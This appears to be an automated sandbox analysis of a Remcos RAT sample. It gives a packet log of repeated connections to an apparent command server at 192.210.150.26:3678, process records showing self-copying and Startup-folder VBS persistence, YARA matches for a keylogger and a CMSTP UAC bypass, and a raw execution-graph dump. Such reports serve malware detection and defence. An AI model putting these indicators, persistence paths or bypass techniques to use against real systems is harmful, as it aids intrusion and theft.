                                            Jan 10, 2025 23:04:10.446536064 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:10.447011948 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:10.451901913 CET367850104192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:11.854808092 CET367850104192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:11.854883909 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.854963064 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.859714985 CET367850104192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:11.925708055 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.930535078 CET367850105192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:11.930619955 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.930881977 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.935630083 CET367850105192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:13.323457003 CET367850105192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:13.323534966 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.323615074 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.328412056 CET367850105192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:13.394952059 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.400053978 CET367850106192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:13.400126934 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.400547981 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.405307055 CET367850106192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:14.810117960 CET367850106192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:14.810211897 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.810211897 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.815042019 CET367850106192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:14.878952026 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.883972883 CET367850107192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:14.884063005 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.884448051 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.889241934 CET367850107192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:16.299868107 CET367850107192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:16.299952984 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.300002098 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.304878950 CET367850107192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:16.363368034 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.368458986 CET367850108192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:16.368555069 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.369009972 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.373898983 CET367850108192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:17.784466982 CET367850108192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:17.786539078 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.786539078 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.791369915 CET367850108192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:17.847520113 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.852427959 CET367850109192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:17.854501963 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.854765892 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.859561920 CET367850109192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:19.324090958 CET367850109192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:19.324198008 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:19.324198008 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:19.329117060 CET367850109192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:19.394553900 CET501103678192.168.2.6192.210.150.26

                                            Target ID:0
                                            Start time:17:00:26
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\l1QC9H0SNR.exe"
                                            Imagebase:0xb50000
                                            File size:921'600 bytes
                                            MD5 hash:BE20DFFFCBA37064D6087AA714036873
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:17:00:27
                                            Start date:10/01/2025
                                            Path:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\l1QC9H0SNR.exe"
                                            Imagebase:0x6c0000
                                            File size:921'600 bytes
                                            MD5 hash:BE20DFFFCBA37064D6087AA714036873
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 75%, ReversingLabs
                                            Reputation:low
                                            Has exited:false

                                            Target ID:3
                                            Start time:17:00:40
                                            Start date:10/01/2025
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs"
                                            Imagebase:0x7ff6948c0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:17:00:40
                                            Start date:10/01/2025
                                            Path:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
                                            Imagebase:0x6c0000
                                            File size:921'600 bytes
                                            MD5 hash:BE20DFFFCBA37064D6087AA714036873
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Target ID:5
                                            Start time:17:00:41
                                            Start date:10/01/2025
                                            Path:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
                                            Imagebase:0x6c0000
                                            File size:921'600 bytes
                                            MD5 hash:BE20DFFFCBA37064D6087AA714036873
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                              Execution Graph

                                              Execution Coverage:3.4%
                                              Dynamic/Decrypted Code Coverage:0.4%
                                              Signature Coverage:8.3%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:179
105002->104979 105004 b538a6 105002->105004 105005 b8d24f 105003->105005 105006 b72efd _W_store_winword 60 API calls 105004->105006 105007 b53ed0 59 API calls 105005->105007 105008 b538b1 105006->105008 105009 b8d25c 105007->105009 105008->104983 105010 b538bb 105008->105010 105009->105009 105011 b72efd _W_store_winword 60 API calls 105010->105011 105012 b538c6 105011->105012 105012->104997 105013 b53907 105012->105013 105015 b53ed0 59 API calls 105012->105015 105013->104997 105014 b53914 105013->105014 105262 b592ce 105014->105262 105017 b538ea 105015->105017 105019 b58047 59 API calls 105017->105019 105021 b538f8 105019->105021 105022 b53ed0 59 API calls 105021->105022 105022->105013 105025 b5928a 59 API calls 105027 b5394f 105025->105027 105026 b58ee0 60 API calls 105026->105027 105027->105025 105027->105026 105028 b53ed0 59 API calls 105027->105028 105029 b53995 Mailbox 105027->105029 105028->105027 105029->104899 105031 b57292 __write_nolock 105030->105031 105032 b572ab 105031->105032 105033 b8ea22 _memset 105031->105033 106140 b54750 105032->106140 105035 b8ea3e 75D3D0D0 105033->105035 105037 b8ea8d 105035->105037 105039 b57bcc 59 API calls 105037->105039 105041 b8eaa2 105039->105041 105041->105041 105043 b572c9 106168 b5686a 105043->106168 105047 b57c45 105046->105047 105048 b57bd8 __NMSG_WRITE 105046->105048 105049 b57d2c 59 API calls 105047->105049 105050 b57c13 105048->105050 105051 b57bee 105048->105051 105054 b57bf6 _memmove 105049->105054 105053 b58029 59 API calls 105050->105053 106502 b57f27 59 API calls Mailbox 105051->106502 105053->105054 105054->104912 105056 b6093a __write_nolock 105055->105056 106503 b56d80 105056->106503 105058 b6093f 105059 b53c14 105058->105059 106514 b6119e 89 API calls 105058->106514 105059->104907 105059->104916 105061 b6094c 105061->105059 106515 b63ee7 91 API calls Mailbox 105061->106515 105063 b60955 105063->105059 105064 b60959 GetFullPathNameW 105063->105064 105065 b57bcc 59 API calls 105064->105065 105066 b60985 
105065->105066 105067 b57bcc 59 API calls 105066->105067 105068 b60992 105067->105068 105069 b94cab _wcscat 105068->105069 105070 b57bcc 59 API calls 105068->105070 105070->105059 105072 b53ab0 LoadImageW RegisterClassExW 105071->105072 105073 b8d261 105071->105073 106553 b53041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 105072->106553 106557 b547a0 LoadImageW EnumResourceNamesW 105073->106557 105077 b8d26a 105078 b539d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105078->104924 105080 b54375 _memset 105079->105080 106558 b54182 105080->106558 105083 b543fa 105091 b94cc3 105090->105091 105103 b609f5 105090->105103 106618 bb9e4a 89 API calls 4 library calls 105091->106618 105166 b60a05 Mailbox 105103->105166 106619 b59e5d 60 API calls 105103->106619 106620 ba6349 341 API calls 105103->106620 105152 bb9e4a 89 API calls 105152->105166 105154 b584c0 69 API calls 105154->105166 105155 b59c90 59 API calls Mailbox 105155->105166 105156 b5b73c 314 API calls 105156->105166 105166->105152 105166->105154 105166->105155 105166->105156 105168->104907 105169->104920 105171 b81940 __write_nolock 105170->105171 105172 b54713 GetModuleFileNameW 105171->105172 105173 b57de1 59 API calls 105172->105173 105174 b54739 105173->105174 105175 b54750 60 API calls 105174->105175 105176 b54743 Mailbox 105175->105176 105176->104927 105178 b57df0 __NMSG_WRITE _memmove 105177->105178 105198 b53d3e __write_nolock 105197->105198 105199 b57bcc 59 API calls 105198->105199 105204 b53ea4 Mailbox 105198->105204 105201 b53d70 105199->105201 105209 b53da6 Mailbox 105201->105209 105323 b579f2 105201->105323 105202 b53e77 105203 b57de1 59 API calls 105202->105203 105202->105204 105206 b53e98 105203->105206 105204->104953 105205 b57de1 59 API calls 105205->105209 105207 b53f74 59 API calls 105206->105207 105207->105204 105209->105202 105209->105204 105209->105205 105210 b579f2 59 API calls 105209->105210 105326 b53f74 105209->105326 105210->105209 105336 b54bb5 105211->105336 
105216 b54e08 LoadLibraryExW 105346 b54b6a 105216->105346 105217 b8d8e6 105219 b54e4a 84 API calls 105217->105219 105221 b8d8ed 105219->105221 105223 b54b6a 3 API calls 105221->105223 105224 b8d8f5 105223->105224 105372 b54f0b 105224->105372 105225 b54e2f 105225->105224 105226 b54e3b 105225->105226 105228 b54e4a 84 API calls 105226->105228 105230 b537d4 105228->105230 105230->104960 105230->104961 105232 b8d91c 105378 b54ec7 105232->105378 105234 b8d929 105236 b58052 105235->105236 105237 b537ef 105235->105237 105802 b57f77 59 API calls 2 library calls 105236->105802 105239 b5928a 105237->105239 105240 b70db6 Mailbox 59 API calls 105239->105240 105241 b537fb 105240->105241 105241->104974 105243 b584cb 105242->105243 105245 b584f2 105243->105245 105803 b589b3 69 API calls Mailbox 105243->105803 105245->104977 105247 b53ef3 105246->105247 105248 b53eda 105246->105248 105250 b57bcc 59 API calls 105247->105250 105249 b58047 59 API calls 105248->105249 105251 b53879 105249->105251 105250->105251 105252 b72efd 105251->105252 105253 b72f7e 105252->105253 105254 b72f09 105252->105254 105806 b72f90 60 API calls 3 library calls 105253->105806 105261 b72f2e 105254->105261 105804 b78b28 58 API calls __getptd_noexit 105254->105804 105257 b72f8b 105257->104999 105258 b72f15 105805 b78db6 9 API calls __mbschr_l 105258->105805 105260 b72f20 105260->104999 105261->104999 105263 b592d6 105262->105263 105264 b70db6 Mailbox 59 API calls 105263->105264 105265 b592e4 105264->105265 105267 b53924 105265->105267 105807 b591fc 59 API calls Mailbox 105265->105807 105268 b59050 105267->105268 105808 b59160 105268->105808 105270 b70db6 Mailbox 59 API calls 105271 b53932 105270->105271 105273 b58ee0 105271->105273 105272 b5905f 105272->105270 105272->105271 105274 b58ef7 105273->105274 105275 b8f17c 105273->105275 105277 b58fff 105274->105277 105278 b59040 105274->105278 105279 b58ff8 105274->105279 105275->105274 105818 b58bdb 59 API calls Mailbox 105275->105818 105277->105027 105817 b59d3c 
60 API calls Mailbox 105278->105817 105280 b70db6 Mailbox 59 API calls 105279->105280 105280->105277 105283 b54ee5 85 API calls 105282->105283 105284 bb95ca 105283->105284 105819 bb9734 96 API calls 2 library calls 105284->105819 105286 bb95dc 105287 b54f0b 74 API calls 105286->105287 105315 b8d186 105286->105315 105288 bb95f7 105287->105288 105289 b54f0b 74 API calls 105288->105289 105290 bb9607 105289->105290 105291 b54f0b 74 API calls 105290->105291 105292 bb9622 105291->105292 105293 b54f0b 74 API calls 105292->105293 105294 bb963d 105293->105294 105295 b54ee5 85 API calls 105294->105295 105296 bb9654 105295->105296 105297 b7571c __crtCompareStringA_stat 58 API calls 105296->105297 105298 bb965b 105297->105298 105299 b7571c __crtCompareStringA_stat 58 API calls 105298->105299 105300 bb9665 105299->105300 105301 b54f0b 74 API calls 105300->105301 105302 bb9679 105301->105302 105820 bb9109 GetSystemTimeAsFileTime 105302->105820 105304 bb968c 105305 bb96a1 105304->105305 105306 bb96b6 105304->105306 105307 b72d55 _free 58 API calls 105305->105307 105308 bb971b 105306->105308 105309 bb96bc 105306->105309 105310 bb96a7 105307->105310 105312 b72d55 _free 58 API calls 105308->105312 105821 bb8b06 105309->105821 105313 b72d55 _free 58 API calls 105310->105313 105312->105315 105313->105315 105315->104964 105317 b54e4a 105315->105317 105316 b72d55 _free 58 API calls 105316->105315 105318 b54e54 105317->105318 105320 b54e5b 105317->105320 105319 b753a6 __fcloseall 83 API calls 105318->105319 105319->105320 105321 b54e7b FreeLibrary 105320->105321 105322 b54e6a 105320->105322 105321->105322 105322->104964 105332 b57e4f 105323->105332 105325 b579fd 105325->105201 105327 b53f82 105326->105327 105331 b53fa4 _memmove 105326->105331 105329 b70db6 Mailbox 59 API calls 105327->105329 105328 b70db6 Mailbox 59 API calls 105330 b53fb8 105328->105330 105329->105331 105330->105209 105331->105328 105333 b57e62 105332->105333 105335 b57e5f _memmove 105332->105335 105334 b70db6 Mailbox 
59 API calls 105333->105334 105334->105335 105335->105325 105383 b54c03 105336->105383 105339 b54bf5 105343 b7525b 105339->105343 105340 b54bec FreeLibrary 105340->105339 105341 b54c03 2 API calls 105342 b54bdc 105341->105342 105342->105339 105342->105340 105387 b75270 105343->105387 105345 b54dfc 105345->105216 105345->105217 105544 b54c36 105346->105544 105349 b54c36 2 API calls 105352 b54b8f 105349->105352 105350 b54ba1 FreeLibrary 105351 b54baa 105350->105351 105353 b54c70 105351->105353 105352->105350 105352->105351 105354 b70db6 Mailbox 59 API calls 105353->105354 105355 b54c85 105354->105355 105548 b5522e 105355->105548 105357 b54c91 _memmove 105358 b54ccc 105357->105358 105359 b54dc1 105357->105359 105360 b54d89 105357->105360 105361 b54ec7 69 API calls 105358->105361 105562 bb991b 95 API calls 105359->105562 105551 b54e89 CreateStreamOnHGlobal 105360->105551 105369 b54cd5 105361->105369 105364 b54f0b 74 API calls 105364->105369 105366 b54d69 105366->105225 105367 b8d8a7 105368 b54ee5 85 API calls 105367->105368 105370 b8d8bb 105368->105370 105369->105364 105369->105366 105369->105367 105557 b54ee5 105369->105557 105371 b54f0b 74 API calls 105370->105371 105371->105366 105373 b8d9cd 105372->105373 105374 b54f1d 105372->105374 105586 b755e2 105374->105586 105377 bb9109 GetSystemTimeAsFileTime 105377->105232 105379 b54ed6 105378->105379 105382 b8d990 105378->105382 105784 b75c60 105379->105784 105381 b54ede 105381->105234 105384 b54bd0 105383->105384 105385 b54c0c LoadLibraryA 105383->105385 105384->105341 105384->105342 105385->105384 105386 b54c1d GetProcAddress 105385->105386 105386->105384 105389 b7527c __initptd 105387->105389 105388 b7528f 105436 b78b28 58 API calls __getptd_noexit 105388->105436 105389->105388 105391 b752c0 105389->105391 105406 b804e8 105391->105406 105392 b75294 105437 b78db6 9 API calls __mbschr_l 105392->105437 105395 b752c5 105396 b752ce 105395->105396 105397 b752db 105395->105397 105438 b78b28 58 API calls __getptd_noexit 
105396->105438 105399 b75305 105397->105399 105400 b752e5 105397->105400 105421 b80607 105399->105421 105439 b78b28 58 API calls __getptd_noexit 105400->105439 105405 b7529f __initptd @_EH4_CallFilterFunc@8 105405->105345 105407 b804f4 __initptd 105406->105407 105408 b79c0b __lock 58 API calls 105407->105408 105418 b80502 105408->105418 105409 b80576 105441 b805fe 105409->105441 105410 b8057d 105446 b7881d 58 API calls 2 library calls 105410->105446 105413 b805f3 __initptd 105413->105395 105414 b80584 105414->105409 105447 b79e2b InitializeCriticalSectionAndSpinCount 105414->105447 105417 b79c93 __mtinitlocknum 58 API calls 105417->105418 105418->105409 105418->105410 105418->105417 105444 b76c50 59 API calls __lock 105418->105444 105445 b76cba RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 105418->105445 105419 b805aa RtlEnterCriticalSection 105419->105409 105422 b80627 __wopenfile 105421->105422 105423 b80641 105422->105423 105435 b807fc 105422->105435 105454 b737cb 60 API calls 2 library calls 105422->105454 105452 b78b28 58 API calls __getptd_noexit 105423->105452 105425 b80646 105453 b78db6 9 API calls __mbschr_l 105425->105453 105427 b8085f 105449 b885a1 105427->105449 105429 b75310 105440 b75332 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105429->105440 105431 b807f5 105431->105435 105455 b737cb 60 API calls 2 library calls 105431->105455 105433 b80814 105433->105435 105456 b737cb 60 API calls 2 library calls 105433->105456 105435->105423 105435->105427 105436->105392 105437->105405 105438->105405 105439->105405 105440->105405 105448 b79d75 RtlLeaveCriticalSection 105441->105448 105443 b80605 105443->105413 105444->105418 105445->105418 105446->105414 105447->105419 105448->105443 105457 b87d85 105449->105457 105451 b885ba 105451->105429 105452->105425 105453->105429 105454->105431 105455->105433 105456->105435 105460 b87d91 __initptd 105457->105460 105458 b87da7 105541 b78b28 58 API calls __getptd_noexit 105458->105541 105460->105458 
105462 b87ddd 105460->105462 105461 b87dac 105542 b78db6 9 API calls __mbschr_l 105461->105542 105468 b87e4e 105462->105468 105465 b87db6 __initptd 105465->105451 105466 b87df9 105543 b87e22 RtlLeaveCriticalSection __unlock_fhandle 105466->105543 105469 b87e6e 105468->105469 105470 b744ea __wsopen_nolock 58 API calls 105469->105470 105473 b87e8a 105470->105473 105471 b78dc6 __invoke_watson 8 API calls 105472 b885a0 105471->105472 105475 b87d85 __wsopen_helper 103 API calls 105472->105475 105474 b87ec4 105473->105474 105485 b87ee7 105473->105485 105517 b87fc1 105473->105517 105476 b78af4 __close 58 API calls 105474->105476 105477 b885ba 105475->105477 105478 b87ec9 105476->105478 105477->105466 105479 b78b28 __mbschr_l 58 API calls 105478->105479 105480 b87ed6 105479->105480 105482 b78db6 __mbschr_l 9 API calls 105480->105482 105481 b87fa5 105483 b78af4 __close 58 API calls 105481->105483 105484 b87ee0 105482->105484 105486 b87faa 105483->105486 105484->105466 105485->105481 105489 b87f83 105485->105489 105487 b78b28 __mbschr_l 58 API calls 105486->105487 105488 b87fb7 105487->105488 105490 b78db6 __mbschr_l 9 API calls 105488->105490 105491 b7d294 __alloc_osfhnd 61 API calls 105489->105491 105490->105517 105492 b88051 105491->105492 105493 b8805b 105492->105493 105494 b8807e 105492->105494 105495 b78af4 __close 58 API calls 105493->105495 105496 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105494->105496 105497 b88060 105495->105497 105504 b880a0 105496->105504 105498 b78b28 __mbschr_l 58 API calls 105497->105498 105501 b8806a 105498->105501 105499 b8811e GetFileType 105502 b88129 GetLastError 105499->105502 105503 b8816b 105499->105503 105500 b880ec GetLastError 105505 b78b07 __dosmaperr 58 API calls 105500->105505 105506 b78b28 __mbschr_l 58 API calls 105501->105506 105507 b78b07 __dosmaperr 58 API calls 105502->105507 105511 b7d52a __set_osfhnd 59 API calls 105503->105511 105504->105499 105504->105500 105508 b87cfd ___createFile 
GetModuleHandleW GetProcAddress CreateFileW 105504->105508 105512 b88111 105505->105512 105506->105484 105509 b88150 CloseHandle 105507->105509 105510 b880e1 105508->105510 105509->105512 105513 b8815e 105509->105513 105510->105499 105510->105500 105519 b88189 105511->105519 105514 b78b28 __mbschr_l 58 API calls 105512->105514 105515 b78b28 __mbschr_l 58 API calls 105513->105515 105514->105517 105516 b88163 105515->105516 105516->105512 105517->105471 105518 b88344 105518->105517 105521 b88517 CloseHandle 105518->105521 105519->105518 105520 b818c1 __lseeki64_nolock 60 API calls 105519->105520 105536 b8820a 105519->105536 105522 b881f3 105520->105522 105523 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105521->105523 105526 b78af4 __close 58 API calls 105522->105526 105522->105536 105525 b8853e 105523->105525 105524 b80e5b 70 API calls __read_nolock 105524->105536 105527 b88572 105525->105527 105528 b88546 GetLastError 105525->105528 105526->105536 105527->105517 105529 b78b07 __dosmaperr 58 API calls 105528->105529 105532 b88552 105529->105532 105530 b80add __close_nolock 61 API calls 105530->105536 105531 b818c1 60 API calls __lseeki64_nolock 105531->105536 105533 b7d43d __free_osfhnd 59 API calls 105532->105533 105533->105527 105534 b897a2 __chsize_nolock 82 API calls 105534->105536 105535 b7d886 __write 78 API calls 105535->105536 105536->105518 105536->105524 105536->105530 105536->105531 105536->105534 105536->105535 105537 b883c1 105536->105537 105538 b80add __close_nolock 61 API calls 105537->105538 105539 b883c8 105538->105539 105540 b78b28 __mbschr_l 58 API calls 105539->105540 105540->105517 105541->105461 105542->105465 105543->105465 105545 b54b83 105544->105545 105546 b54c3f 